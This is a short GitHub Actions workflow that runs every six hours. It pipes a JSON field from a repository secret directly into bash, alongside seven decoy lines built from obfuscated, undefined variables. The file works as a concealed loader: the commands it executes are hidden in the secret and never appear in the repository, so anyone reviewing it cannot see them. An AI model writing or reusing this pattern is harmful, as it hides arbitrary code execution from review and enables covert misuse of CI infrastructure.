name: zhongxiaozxs
on:
  workflow_dispatch:
  schedule:
    - cron: '34 0/6 * * *'

jobs:  # 7758
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: zhongxiaozxs
        env:
          v5823: ${{ secrets.v5823 }}
        run: |
          echo $v5823 | jq -r .bpeg089 | /bin/bash
          echo $ew074 | jq -r .yww587 | /bin/bash
          echo $t73 | jq -r .a2 | /bin/bash
          echo $xs54 | jq -r .regsy833 | /bin/bash
          echo $gpe191 | jq -r .qnduz7705 | /bin/bash
          echo $ms69620 | jq -r .kybfi4094 | /bin/bash
          echo $y203 | jq -r .jru5 | /bin/bash
          echo $vsdjr5 | jq -r .uqd6 | /bin/bash

